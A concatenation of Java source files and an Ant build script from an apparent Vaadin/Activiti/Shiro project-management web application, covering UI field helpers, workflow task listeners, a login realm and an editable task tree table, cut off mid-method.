package com.klwork.test.base;
import org.apache.ibatis.session.SqlSessionFactory;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.test.context.ContextConfiguration;
import org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests;
@ContextConfiguration(locations = { "classpath:/spring-config/applicationContext.xml" })
public abstract class BaseTxWebTests extends AbstractTransactionalJUnit4SpringContextTests {
protected Logger logger = LoggerFactory.getLogger(getClass());
public BaseTxWebTests() {
}
/**
* 刷新session
*/
private void flushSession() {
SqlSessionFactory sessionFactory = (SqlSessionFactory) applicationContext
.getBean("sqlSessionFactory");
sessionFactory.openSession().commit();
}
protected static boolean isTest = false;
/**
* 执行此方法后将会把测试数据写进数据库
*/
public void flushToDataBase() {
if (!isTest) {
flushSession();
//setComplete();
}
}
}<file_sep>/src/main/java/com/klwork/business/domain/model/TeamMembershipQuery.java
package com.klwork.business.domain.model;
import com.klwork.common.dao.QueryParameter;
/**
*
* @version 1.0
* @created ${plugin.now}
* @author ww
*
*/
public class TeamMembershipQuery extends QueryParameter{
}
<file_sep>/src/main/java/com/klwork/explorer/ui/handler/CommonFieldHandler.java
package com.klwork.explorer.ui.handler;
import java.util.Map;
import com.klwork.common.utils.StringTool;
import com.klwork.explorer.ui.mainlayout.ExplorerLayout;
import com.vaadin.data.Item;
import com.vaadin.server.Sizeable.Unit;
import com.vaadin.shared.ui.datefield.Resolution;
import com.vaadin.ui.CheckBox;
import com.vaadin.ui.ComboBox;
import com.vaadin.ui.Component;
import com.vaadin.ui.DateField;
import com.vaadin.ui.Label;
import com.vaadin.ui.TextArea;
import com.vaadin.ui.TextField;
public class CommonFieldHandler {
public static TextField createTextField(String caption) {
TextField f = new TextField();
if (StringTool.judgeBlank(caption)) {
f.setCaption(caption);
}
// TextField f = new TextField(caption);
f.setNullRepresentation("");
return f;
}
public static CheckBox createCheckBox(String caption) {
CheckBox cb = new CheckBox(caption);
cb.setImmediate(true);
return cb;
}
public static TextArea createTextArea(String caption) {
TextArea f = new TextArea();
if (StringTool.judgeBlank(caption)) {
f.setCaption(caption);
}
f.setNullRepresentation("");
return f;
}
public static DateField createDateField(String caption,
boolean useSecondResolution) {
DateField f = new DateField();
if (StringTool.judgeBlank(caption)) {
f.setCaption(caption);
}
f.setDateFormat("yyyy-MM-dd HH:mm");
f.setShowISOWeekNumbers(true);
if (useSecondResolution) {
f.setResolution(Resolution.SECOND);
} else {
f.setResolution(Resolution.MINUTE);
}
return f;
}
public static ComboBox createComBox(String caption,
Map<String, String> data, Object defaultValue) {
ComboBox s = new ComboBox();
s.setNullSelectionAllowed(false);
Object firstItemId = null;
if (StringTool.judgeBlank(caption)) {
s.setCaption(caption);
}
for (String p : data.keySet()) {
String title = data.get(p);
Item i = s.addItem(p);
s.setItemCaption(p, title);
if(p.equals(defaultValue)){
firstItemId = p;
}
}
// Select first element
if (firstItemId != null) {
s.select(firstItemId);
}
return s;
}
/**
* 得到一个分界线
* @return
*/
public static Component getSpacer() {
// 增加一个分隔线
Label spacer = new Label();
spacer.setWidth(100, Unit.PERCENTAGE);
spacer.addStyleName(ExplorerLayout.STYLE_DETAIL_BLOCK);
return spacer;
}
}
<file_sep>/others/build.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE project [<!ENTITY common SYSTEM "common.xml">]>
<project name="ResolveJarsByMaven" basedir="." default="" xmlns:artifact="urn:maven-artifact-ant">
<property name="mvnsettings" value="mvnSettings.xml" />
<property environment="env" />
<property name="project.home" value="${basedir}/.." />
<property name="WebRoot" value="${project.home}/WebRoot" />
<property name="WEB-INF/lib" value="${WebRoot}/WEB-INF/lib" />
<property name="classes" value="${WebRoot}/WEB-INF/classes" />
<property name="jar-sources" value="${basedir}/jar-sources" />
<property name="jar-others" value="${basedir}/jar-others" />
<property name="spec-lib" value="${basedir}/spec-lib" />
<property name="third-lib" value="${basedir}/third-lib" />
<typedef resource="org/apache/maven/artifact/ant/antlib.xml" uri="urn:maven-artifact-ant">
<classpath>
<pathelement location="${basedir}/spec-lib/maven-ant-tasks-2.1.3.jar" />
</classpath>
</typedef>
<artifact:pom file="../pom.xml" id="maven.project" />
<target name="copyRuntimeJars" description="将所有运行时所需的Jar包都放到WEB-INF的lib下">
<artifact:dependencies pathId="runtime.classpath" filesetId="runtime.fileset" useScope="runtime" settingsfile="${mvnsettings}">
<pom refid="maven.project" />
</artifact:dependencies>
<delete>
<fileset dir="${WEB-INF/lib}" includes="*.jar" />
</delete>
<copy todir="${WEB-INF/lib}">
<fileset refid="runtime.fileset" />
<mapper type="flatten" />
</copy>
<!-- 将一些特殊的包,自己下载的放在此目录下-->
<copy todir="${WEB-INF/lib}" preservelastmodified="true">
<fileset dir="${third-lib}" />
<mapper type="flatten" />
</copy>
</target>
<target name="copyOtherJars" description="将除运行时所需的Jar包外都放到otherlibs下">
<artifact:dependencies pathId="full.classpath" filesetId="full.fileset" sourcesfilesetid="full.sources.fileset" useScope="test" settingsfile="${mvnsettings}">
<pom refid="maven.project" />
</artifact:dependencies>
<copy todir="${jar-sources}">
<fileset refid="full.sources.fileset" />
<mapper type="flatten" />
</copy>
<!--<copy todir="${jar-others}">
<referenceFileset refid="full.fileset" excludeDir="${WEB-INF/lib}" />
<mapper type="flatten" />
</copy>-->
</target>
<path id="testTask.classpath">
<fileset dir="${WEB-INF/lib}">
<include name="**/*.jar" />
</fileset>
</path>
<target name="SassCompile" description="SassCompile">
<property name="param1" value="${WebRoot}/VAADIN/themes/social/styles.scss" />
<property name="param2" value="${WebRoot}/VAADIN/themes/social/styles.css" />
<java classname="com.vaadin.sass.SassCompiler">
<arg value="${param1}" />
<arg value="${param2}" />
<classpath>
<path refid="testTask.classpath" />
</classpath>
</java>
</target>
</project>
<file_sep>/src/main/java/com/klwork/flow/act/ActTaskAssignmentListener.java
/* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.klwork.flow.act;
import org.activiti.engine.delegate.DelegateTask;
import org.activiti.engine.delegate.TaskListener;
import com.klwork.business.domain.model.EntityDictionary;
import com.klwork.business.domain.model.OutsourcingProject;
import com.klwork.business.domain.service.OutsourcingProjectService;
import com.klwork.business.domain.service.ProjectManagerService;
import com.klwork.explorer.ViewToolManager;
import com.klwork.flow.task.ExecutionHandler;
/**
* @author <NAME>
*/
public class ActTaskAssignmentListener implements TaskListener {
private static final long serialVersionUID = 1L;
private static OutsourcingProjectService outsourcingProjectService = ViewToolManager
.getBean("outsourcingProjectService");
private static ProjectManagerService projectManagerService = ViewToolManager
.getBean("projectManagerService");
public void notify(DelegateTask delegateTask) {
delegateTask.setDescription("TaskAssignmentListener is listening: "
+ delegateTask.getAssignee());
String userId = ExecutionHandler.getVar(delegateTask,EntityDictionary.CLAIM_USER_ID);
String outsourcingProjectId = ExecutionHandler.getVar(delegateTask,EntityDictionary.OUTSOURCING_PROJECT_ID);
if (userId != null) {
System.out.println("外部claimUserId:" + userId);
delegateTask.setAssignee((String) userId);
} else {
OutsourcingProject p = outsourcingProjectService.findOutsourcingProjectById(outsourcingProjectId);
if(p != null){
System.out.println("项目参与人:" + p.getOwnUser());
delegateTask.setAssignee(p.getOwnUser());
userId = p.getOwnUser();
}
}
projectManagerService.addNewParticipate(outsourcingProjectId, userId);
saveAuthToVariable(delegateTask, userId.toString());
}
private void saveAuthToVariable(DelegateTask delegateTask,
String authenticatedUserId) {
delegateTask.setVariableLocal(EntityDictionary.CLAIM_USER_ID,
authenticatedUserId);
delegateTask.getExecution().setVariableLocal(EntityDictionary.CLAIM_USER_ID,
authenticatedUserId);
}
}
<file_sep>/src/main/java/com/klwork/flow/act/CurrentReviewService.java
package com.klwork.flow.act;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import org.activiti.engine.delegate.DelegateExecution;
import org.activiti.engine.delegate.JavaDelegate;
import com.klwork.business.domain.model.EntityDictionary;
import com.klwork.business.domain.service.ProjectParticipantService;
import com.klwork.explorer.ViewToolManager;
public class CurrentReviewService implements JavaDelegate {
private static ProjectParticipantService projectParticipantService = ViewToolManager
.getBean("projectParticipantService");
@Override
public void execute(DelegateExecution execution) {
//String participants = (String) execution.getVariable("participants");
String outsourcingProjectId = (String) execution.getVariable(EntityDictionary.OUTSOURCING_PROJECT_ID);
String upLoadtaskId = (String) execution.getVariable(EntityDictionary.UP_LOADTASK_ID);
System.out.println("上一个任务:" + upLoadtaskId);
String participants = "ww_management,ww";
//找到任务的审核人进行审核
String[] participantsArray = participants.split(",");
List<String> assigneeList = new ArrayList<String>();
for (String assignee : participantsArray) {
assigneeList.add(assignee);
}
//execution.setVariable("reviewersList", assigneeList);
execution.setVariable("reviewer", "ww_management");
//保存到本地一份
execution.setVariableLocal(EntityDictionary.UP_LOADTASK_ID, upLoadtaskId);
//提前生成审核人
projectParticipantService.addProjectParticipantByParam(outsourcingProjectId, "ww_management", EntityDictionary.PARTICIPANTS_TYPE_SCORER,upLoadtaskId);
//加入审核人
}
}
<file_sep>/src/main/java/com/klwork/ui/security/MyJdbcShiroRealm.java
package com.klwork.ui.security;
import java.util.ArrayList;
import java.util.List;
import org.activiti.engine.IdentityService;
import org.activiti.engine.identity.Group;
import org.activiti.engine.identity.User;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.AuthenticationInfo;
import org.apache.shiro.authc.AuthenticationToken;
import org.apache.shiro.authc.SimpleAuthenticationInfo;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.authz.AuthorizationInfo;
import org.apache.shiro.authz.SimpleAuthorizationInfo;
import org.apache.shiro.realm.AuthorizingRealm;
import org.apache.shiro.session.Session;
import org.apache.shiro.subject.PrincipalCollection;
import org.apache.shiro.subject.Subject;
import com.klwork.explorer.Constants;
/**
* Shiro Realm 实现
*
* @author ww
*
*/
public class MyJdbcShiroRealm extends AuthorizingRealm {
private IdentityService identityService;
public IdentityService getIdentityService() {
return identityService;
}
public void setIdentityService(IdentityService identityService) {
this.identityService = identityService;
}
/**
* 授权信息
*/
protected AuthorizationInfo doGetAuthorizationInfo(
PrincipalCollection principals) {
String username = (String) principals.fromRealm(getName()).iterator()
.next();
if (username != null) {
User la = identityService.createUserQuery().userId(username)
.singleResult();
if (la != null && currentRoles() != null) {
SimpleAuthorizationInfo info = new SimpleAuthorizationInfo();
/*
* for (Role each : currentRoles) { if (each.getName() != null)
* info.addRole(each.getName()); Collection<String> pers =
* each.getPermissionsAsString(); if (pers != null)
* info.addStringPermissions(pers); }
*/
info.addRole("user");
info.addStringPermission("main");
return info;
}
}
return null;
}
private List currentRoles() {
List test = new ArrayList();
return test;
}
/**
* 认证信息
*/
protected AuthenticationInfo doGetAuthenticationInfo(
AuthenticationToken authcToken) throws AuthenticationException {
UsernamePasswordToken token = (UsernamePasswordToken) authcToken;
String userName = token.getUsername();
String password = new String(token.getPassword());
LoggedInUserImpl loggedInUser = null;
if (identityService.checkPassword(userName, password)) {
loggedInUser = subjectToUserEntity(userName, password);
}
if (loggedInUser != null) {
//WW_TODO 登录成功设置用户信息
LoginHandler.setUser(loggedInUser);
Subject subject = SecurityUtils.getSubject();
Session session = subject.getSession();
session.setAttribute(LoginHandler.LOGIN_USER_KEY, loggedInUser);
return new SimpleAuthenticationInfo(loggedInUser.getId(),
loggedInUser.getPassword(), getName());
}
return null;
}
public LoggedInUserImpl subjectToUserEntity(String userName, String password) {
LoggedInUserImpl loggedInUser;
User user = identityService.createUserQuery().userId(userName)
.singleResult();
// Fetch and cache user data
loggedInUser = new LoggedInUserImpl(user, password);
List<Group> groups = identityService.createGroupQuery()
.groupMember(user.getId()).list();
for (Group group : groups) {
if (Constants.SECURITY_ROLE.equals(group.getType())) {
loggedInUser.addSecurityRoleGroup(group);
if (Constants.SECURITY_ROLE_USER.equals(group.getId())) {
loggedInUser.setUser(true);
}
if (Constants.SECURITY_ROLE_ADMIN.equals(group.getId())) {
loggedInUser.setAdmin(true);
}
} else {
loggedInUser.addGroup(group);
}
}
return loggedInUser;
}
}
<file_sep>/src/main/java/com/klwork/explorer/project/ProjectTreeTable.java
package com.klwork.explorer.project;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Date;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import org.vaadin.peter.contextmenu.ContextMenu;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuItemClickEvent;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuOpenedListener;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuOpenedListener.TableListener;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuOpenedOnTableFooterEvent;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuOpenedOnTableHeaderEvent;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuOpenedOnTableRowEvent;
import com.klwork.business.domain.model.Todo;
import com.klwork.business.domain.model.TodoQuery;
import com.klwork.business.domain.service.TodoService;
import com.klwork.common.utils.StringDateUtil;
import com.klwork.common.utils.StringTool;
import com.klwork.explorer.I18nManager;
import com.klwork.explorer.Messages;
import com.klwork.explorer.ViewToolManager;
import com.klwork.explorer.ui.Images;
import com.klwork.explorer.ui.event.SubmitEvent;
import com.klwork.explorer.ui.event.SubmitEventListener;
import com.klwork.explorer.ui.handler.CommonFieldHandler;
import com.klwork.fk.utils.SpringApplicationContextUtil;
import com.klwork.ui.security.LoginHandler;
import com.vaadin.data.Container;
import com.vaadin.data.Item;
import com.vaadin.data.Property;
import com.vaadin.data.Property.ValueChangeEvent;
import com.vaadin.data.Property.ValueChangeListener;
import com.vaadin.data.fieldgroup.FieldGroup;
import com.vaadin.data.fieldgroup.FieldGroup.CommitException;
import com.vaadin.data.util.BeanItem;
import com.vaadin.data.util.HierarchicalContainer;
import com.vaadin.event.Action;
import com.vaadin.event.FieldEvents.BlurEvent;
import com.vaadin.event.FieldEvents.BlurListener;
import com.vaadin.event.FieldEvents.FocusEvent;
import com.vaadin.event.FieldEvents.FocusListener;
import com.vaadin.event.ItemClickEvent;
import com.vaadin.event.ShortcutAction;
import com.vaadin.ui.Alignment;
import com.vaadin.ui.Button;
import com.vaadin.ui.Button.ClickEvent;
import com.vaadin.ui.Button.ClickListener;
import com.vaadin.ui.Table.ColumnGenerator;
import com.vaadin.ui.CheckBox;
import com.vaadin.ui.ComboBox;
import com.vaadin.ui.Component;
import com.vaadin.ui.CustomComponent;
import com.vaadin.ui.DateField;
import com.vaadin.ui.Field;
import com.vaadin.ui.HorizontalLayout;
import com.vaadin.ui.Label;
import com.vaadin.ui.NativeSelect;
import com.vaadin.ui.Notification;
import com.vaadin.ui.Panel;
import com.vaadin.ui.Table;
import com.vaadin.ui.TableFieldFactory;
import com.vaadin.ui.TextField;
import com.vaadin.ui.TreeTable;
import com.vaadin.ui.VerticalLayout;
import com.vaadin.ui.themes.Reindeer;
import com.vaadin.ui.themes.Runo;
public class ProjectTreeTable extends CustomComponent {
private static final long serialVersionUID = 7916755916967574384L;
private String projectId;
protected I18nManager i18nManager;
ProjectMain main = null;
HashMap<String, BeanItem<Todo>> inventoryStore = new HashMap<String, BeanItem<Todo>>();
BeanItem<Todo> testBeanItem = null;
Property<String> integerPropety = null;
private final ArrayList<Object> visibleColumnIds = new ArrayList<Object>();
private final ArrayList<String> visibleColumnLabels = new ArrayList<String>();
// Map to find a field component by its item ID and property ID
final HashMap<Object, HashMap<Object, Field>> fields = new HashMap<Object, HashMap<Object, Field>>();
// Map to find the item ID of a field
final HashMap<Field, Object> itemIds = new HashMap<Field, Object>();
final TreeTable mainTreeTable = new TreeTable("我的周计划");
private BeanItem<Todo> currentBeanItem;
HierarchicalContainer hContainer = null;
private FieldGroup scheduleEventFieldGroup = new FieldGroup();
VerticalLayout bottomLayout;
//
TodoService todoService;
public ProjectTreeTable(String prgId, ProjectMain projectMain) {
System.out.println("ProjectTreeTable 初始化");
this.i18nManager = ViewToolManager.getI18nManager();
this.main = projectMain;
this.projectId = prgId;
todoService = (TodoService) SpringApplicationContextUtil.getContext()
.getBean("todoService");
init();
}
protected void init() {
VerticalLayout layout = new VerticalLayout();
setCompositionRoot(layout);
layout.setSizeFull();
initHead(layout);
// 主界面
initMain(layout);
}
@SuppressWarnings("unchecked")
private Todo getFieldGroupTodo() {
BeanItem<Todo> item = (BeanItem<Todo>) scheduleEventFieldGroup
.getItemDataSource();
Todo todo = item.getBean();
initTodoProId(todo);
return todo;
}
public void initTodoProId(Todo todo) {
// WW_TODO 保存是设置项目id和用户
if (!StringTool.judgeBlank(todo.getProId())) {
todo.setProId(projectId);
}
if (todo.getAssignedUser() == null) {
todo.setAssignedUser(LoginHandler.getLoggedInUser().getId());
}
}
private void initHead(VerticalLayout layout) {
// Header
HorizontalLayout header = new HorizontalLayout();
header.setWidth(100, Unit.PERCENTAGE);
/*
* final Button saveButton = new Button(
* i18nManager.getMessage(Messages.PROFILE_SAVE));
* saveButton.setIcon(Images.SAVE); saveButton.addClickListener(new
* ClickListener() { public void buttonClick(ClickEvent event) {
* commit(); }
*
* });
*
* header.addComponent(saveButton);
* header.setComponentAlignment(saveButton, Alignment.MIDDLE_RIGHT);
*/
layout.addComponent(header);
layout.setSpacing(true);
}
void initMain(VerticalLayout layout) {
// 用一个panel包含,实现快捷键
Panel panel = new Panel();
panel.addActionHandler(new KbdHandler());
// panel.setHeight(-1, Unit.PIXELS);
layout.addComponent(panel);
layout.setExpandRatio(panel, 1.0f);
panel.setContent(mainTreeTable);
// init tabletree
mainTreeTable.setEditable(true);
mainTreeTable.setImmediate(true);
mainTreeTable.setWidth("100%");
mainTreeTable.setHeight("500px");
mainTreeTable.setColumnExpandRatio("name", 1);
mainTreeTable.setSelectable(true);
mainTreeTable.setColumnReorderingAllowed(true);
// 数据构造
hContainer = createTreeContent();
mainTreeTable.setContainerDataSource(hContainer);
// table的表现信息,绑定数据
initTableField(mainTreeTable);
// 拖动
// handDrop(ttable);
// 设置表头的显示(那些字段可见及其中文)
setTableHeadDisplay(mainTreeTable);
// 设置表行的双击操作,和其他监听
setTableListener(mainTreeTable);
Object hierarchyColumnId = "name";
// 那个列为树形的
mainTreeTable.setHierarchyColumn(hierarchyColumnId);
// 右键功能
rightClickHandler(mainTreeTable);
mainTreeTable.setImmediate(true);
// 展开所有节点
collapsedAll(mainTreeTable);
}
private void collapsedAll(final TreeTable ttable) {
for (Object item : ttable.getItemIds().toArray()) {
collapsedSub(ttable, item);
}
}
private void collapsedSub(final TreeTable ttable, Object item) {
ttable.setCollapsed(item, false);
if (ttable.hasChildren(item)) {
for (Object a : ttable.getChildren(item).toArray()) {
ttable.setCollapsed(a, false);
collapsedSub(ttable, a);
}
}
}
private void setTableListener(final TreeTable ttable) {
ttable.addItemClickListener(new ItemClickEvent.ItemClickListener() {
private static final long serialVersionUID = -348059189217149508L;
@Override
public void itemClick(ItemClickEvent event) {
if (event.isDoubleClick()) {
// Notification.show(event.getSource().toString());
Object source = event.getItemId();
HashMap<Object, Field> itemMap = fields.get(source);
for (Field f : itemMap.values()) {
f.focus();
}
}
}
});
ttable.addValueChangeListener(new ValueChangeListener() {
@Override
public void valueChange(ValueChangeEvent event) {
Object value = ttable.getValue();
if (value instanceof BeanItem) {
currentBeanItem = (BeanItem<Todo>) value;
}
// 同时更新下面的数据
// updateBottomLayout(bottomLayout);
}
});
addListener(new SubmitEventListener() {
private static final long serialVersionUID = 1L;
protected void submitted(SubmitEvent event) {
}
protected void cancelled(SubmitEvent event) {
}
});
}
private void setTableHeadDisplay(final TreeTable ttable) {
visibleColumnIds.add("name");
visibleColumnIds.add("priority");
visibleColumnIds.add("complete");
visibleColumnIds.add("endTime");
visibleColumnIds.add("useUp");
visibleColumnIds.add("due");
visibleColumnIds.add("status");
visibleColumnIds.add("tags");
visibleColumnIds.add("type");
visibleColumnIds.add("edit");
visibleColumnLabels.add("标题");
visibleColumnLabels.add("!");
visibleColumnLabels.add("%");
visibleColumnLabels.add("结束时间");
visibleColumnLabels.add("耗尽");
visibleColumnLabels.add("到期");
visibleColumnLabels.add("状态");
visibleColumnLabels.add("标签");
visibleColumnLabels.add("类型");
visibleColumnLabels.add("操作");
ttable.addGeneratedColumn("edit", new ValueEditColumnGenerator());
ttable.setVisibleColumns(visibleColumnIds.toArray());
ttable.setColumnHeaders(visibleColumnLabels.toArray(new String[0]));
}
private void rightClickHandler(final TreeTable ttable) {
ContextMenu tableContextMenu = new ContextMenu();
tableContextMenu.addContextMenuTableListener(createOpenListener());
tableContextMenu.addItem("新建子任务").addItemClickListener(
new ContextMenu.ContextMenuItemClickListener() {
@Override
public void contextMenuItemClicked(
ContextMenuItemClickEvent event) {
Item parentItem = hContainer.getItem(currentBeanItem);
Todo newTodo = todoService.newTodo();
newTodo.setProId(projectId);
BeanItem newbeanItem = new BeanItem<Todo>(newTodo);
Item nItem = hContainer.addItem(newbeanItem);
hContainer.setChildrenAllowed(newbeanItem, false);
hContainer.setChildrenAllowed(currentBeanItem, true);
copyBeanValueToContainer(hContainer, newbeanItem);
// 设置父节点
hContainer.setParent(newbeanItem, currentBeanItem);
Todo paretTodo = currentBeanItem.getBean();
// 新的记录设置为
hContainer.getContainerProperty(newbeanItem, "pid")
.setValue(paretTodo.getId());
// 老的记录
hContainer.getContainerProperty(currentBeanItem,
"isContainer").setValue(1);
ttable.setCollapsed(currentBeanItem, false);
ttable.setImmediate(true);
}
});
tableContextMenu.addItem("新建任务").addItemClickListener(
new ContextMenu.ContextMenuItemClickListener() {
@Override
public void contextMenuItemClicked(
ContextMenuItemClickEvent event) {
Todo newTodo = todoService.newTodo();
newTodo.setProId(projectId);
BeanItem newbeanItem = new BeanItem<Todo>(newTodo);
Item nItem = hContainer.addItem(newbeanItem);
hContainer.setChildrenAllowed(newbeanItem, false);
copyBeanValueToContainer(hContainer, newbeanItem);
// 设置父节点
hContainer.setParent(newbeanItem, null);
}
});
tableContextMenu.setAsTableContextMenu(ttable);
}
private TableListener createOpenListener() {
ContextMenuOpenedListener.TableListener openListener = new ContextMenuOpenedListener.TableListener() {
@Override
public void onContextMenuOpenFromRow(
ContextMenuOpenedOnTableRowEvent event) {
Object itemId = event.getItemId();
if (itemId instanceof BeanItem) {
currentBeanItem = (BeanItem<Todo>) itemId;
}
// contextMenu.open(event.getX(), event.getY());
}
@Override
public void onContextMenuOpenFromHeader(
ContextMenuOpenedOnTableHeaderEvent event) {
}
@Override
public void onContextMenuOpenFromFooter(
ContextMenuOpenedOnTableFooterEvent event) {
}
};
return openListener;
}
private void openEdit(TreeTable ttable, final Object itemId) {
HashMap<Object, Field> itemMap = fields.get(itemId);
//
for (Field f : itemMap.values())
f.setReadOnly(false);
ttable.select(itemId);
}
private void initTableField(final TreeTable ttable) {
ttable.setTableFieldFactory(new TableFieldFactory() {
private static final long serialVersionUID = -5741977060384915110L;
public Field createField(Container container, Object itemId,
final Object propertyId, Component uiContext) {
TextField tf = null;
if ("name".equals(propertyId)) {
final BeanItem<Todo> beanItem = (BeanItem<Todo>) itemId;
if (getTfFromCache(itemId, propertyId) != null) {
tf = getTfFromCache(itemId, propertyId);
// bindFieldToObje(itemId, propertyId, tf, beanItem);
return tf;
}
tf = new TextField((String) propertyId);
// bindFieldToObje(itemId, propertyId, tf, beanItem);
// Needed for the generated column
tf.setImmediate(true);
tf.setReadOnly(true);
tf.setWidth("100%");
tf.addFocusListener(new FocusListener() {
private static final long serialVersionUID = 1006388127259206641L;
public void focus(FocusEvent event) {
openEdit(ttable, beanItem);
}
});
tf.addBlurListener(new BlurListener() {
private static final long serialVersionUID = -4497552765206819985L;
public void blur(BlurEvent event) {
HashMap<Object, Field> itemMap = fields
.get(beanItem);
for (Field f : itemMap.values()) {// 所有字段只读
f.setReadOnly(true);
}
// copy toBean
Todo todo = tableItemToBean(currentBeanItem);
List<Todo> l = new ArrayList();
l.add(todo);
todoService.saveTodoList(l);
// reflashBottom();
}
});
// 把name设置到cache中
saveTfToCache(itemId, propertyId, tf);
} else {
tf = new TextField((String) propertyId);
tf.setData(itemId);
tf.setImmediate(true);
// tf.setSizeFull();
// tf.setSizeUndefined();
tf.setWidth(50, Unit.PIXELS);
tf.setReadOnly(true);
}
return tf;
}
private void bindFieldToObje(Object itemId,
final Object propertyId, TextField tf,
final BeanItem<Todo> beanItem) {
BeanItem<Todo> f = inventoryStore.get(getBeanSign(beanItem));
tf.setPropertyDataSource(f.getItemProperty(propertyId));
System.out.println(propertyId + "---------" + itemId);
}
private void saveTfToCache(final Object itemId,
final Object propertyId, TextField tf) {
if (tf != null) {
// Manage the field in the field storage
HashMap<Object, Field> itemMap = fields.get(itemId);
if (itemMap == null) {
itemMap = new HashMap<Object, Field>();
fields.put(itemId, itemMap);
}
itemMap.put(propertyId, tf);// 每个属性一个textfield
itemIds.put(tf, itemId);
}
}
private TextField getTfFromCache(Object itemId, Object propertyId) {
TextField tf = null;
// Manage the field in the field storage
HashMap<Object, Field> itemMap = fields.get(itemId);
if (itemMap == null) {
itemMap = new HashMap<Object, Field>();
fields.put(itemId, itemMap);
}
if (itemMap.get(propertyId) != null) {
tf = (TextField) itemMap.get(propertyId);
}
return tf;
}
}
);
}
/**
* table属性的创建
*
* @return
*/
public HierarchicalContainer createTreeContent() {
HierarchicalContainer container = new HierarchicalContainer();
container.addContainerProperty("priority", String.class, "");
container.addContainerProperty("complete", String.class, "");
container.addContainerProperty("endTime", String.class, "");
container.addContainerProperty("useUp", String.class, "");
container.addContainerProperty("due", String.class, "");
container.addContainerProperty("status", String.class, "");
container.addContainerProperty("tags", String.class, "");
container.addContainerProperty("type", String.class, "");
container.addContainerProperty("name", String.class, "");
container.addContainerProperty("id", String.class, "");
container.addContainerProperty("pid", String.class, "");
container.addContainerProperty("container", Boolean.class, null);
container.addContainerProperty("isContainer", Integer.class, null);
initContainerData(container, getQuery("-1"), null);
return container;
}
private TodoQuery getQuery(String pid) {
TodoQuery query = new TodoQuery();
query.setProId(projectId).setPid(pid).setOrderBy(" pid asc,id asc");
return query;
}
private void initContainerData(HierarchicalContainer container,
TodoQuery query, BeanItem<Todo> parent) {
List<Todo> beanList = todoService.findTodoByQueryCriteria(query, null);
for (Iterator iterator = beanList.iterator(); iterator.hasNext();) {
Todo todo = (Todo) iterator.next();
BeanItem<Todo> newBeanItem = new BeanItem(todo);
container.addItem(newBeanItem);
container.setParent(newBeanItem, parent);
copyBeanValueToContainer(container, newBeanItem);
inventoryStore.put(getBeanSign(newBeanItem), newBeanItem);
boolean isContainer = StringTool.parseBoolean(todo.getIsContainer()
+ "");
if (isContainer) {
container.setChildrenAllowed(newBeanItem, true);
initContainerData(container, getQuery(todo.getId()),
newBeanItem);
} else {
container.setChildrenAllowed(newBeanItem, false);
}
/*
* if(parent != null){ mainTreeTable.setCollapsed(parent, false); }
*/
}
}
/**
* 把Bean的值copy到容器中
*
* @param container
* @param newBeanItem
*/
public void copyBeanValueToContainer(HierarchicalContainer container,
BeanItem<Todo> newBeanItem) {
for (Object propertyId : container.getContainerPropertyIds()) {
setContainerValueByBean(container, newBeanItem, propertyId);
}
}
private String getBeanSign(BeanItem<Todo> beanItem) {
return beanItem.getBean().getId() + "_" + beanItem.getBean().getName();
}
/**
* 给容器设置为bean的字
*
* @param container
* @param beanItem
* @param propertyId
*/
private void setContainerValueByBean(HierarchicalContainer container,
BeanItem<Todo> beanItem, Object propertyId) {
Todo t = beanItem.getBean();
String[] benTo = { "priority", "type", "tag", "name", "id", "pid" };
for (int i = 0; i < benTo.length; i++) {
if (benTo[i].equals(propertyId)) {
Property itemProperty = beanItem.getItemProperty(propertyId);
// bean的属性copy到其他
/*
* Property itemProperty2 =
* container.getItem(beanItem).getItemProperty(propertyId);
* itemProperty2 .setValue(itemProperty.getValue());
*/
String newValue = itemProperty.getValue() + "";
container.getContainerProperty(beanItem, propertyId).setValue(
newValue);
}
}
/*
* container.addContainerProperty("priority", String.class, "");
* container.addContainerProperty("complete", String.class, "");
* container.addContainerProperty("endTime", String.class, "");
* container.addContainerProperty("useUp", String.class, "");
* container.addContainerProperty("due", String.class, "");
* container.addContainerProperty("status", String.class, "");
* container.addContainerProperty("tags", String.class, "");
* container.addContainerProperty("type", String.class, "");
* container.addContainerProperty("name", String.class, "");
* container.addContainerProperty("container", Boolean.class, null);
*/
if ("isContainer".equals(propertyId)) {
container.getContainerProperty(beanItem, propertyId).setValue(
t.getIsContainer());
}
if ("container".equals(propertyId)) {
boolean v = StringTool.parseBoolean(t.getIsContainer() + "");
container.getContainerProperty(beanItem, propertyId).setValue(v);
}
if ("due".equals(propertyId)) {
String v = StringDateUtil.dateToYMDString(new Date());
container.getContainerProperty(beanItem, propertyId).setValue(v);
}
}
/**
* 提交table的所有内容
*/
public void allCommit() {
mainTreeTable.commit();
List<Todo> beanList = tableDataBeanList();
todoService.saveTodoList(beanList);
}
// 表格的展开数据,变成Bean,getItemIds只包含指定的数据
private List<Todo> tableDataBeanList() {
List<Todo> beanList = new ArrayList<Todo>();
Collection<?> list = mainTreeTable.getItemIds();
for (Iterator iterator = list.iterator(); iterator.hasNext();) {// table记录
BeanItem<Todo> beanItem = (BeanItem) iterator.next();
Todo todo = tableItemToBean(beanItem);
initTodoProId(todo);
beanList.add(todo);
System.out.println("--------------" + todo);
}
return beanList;
}
/**
* 将table的数据复制到bing中
*
* @param beanItem
* @return
*/
public Todo tableItemToBean(BeanItem<Todo> beanItem) {
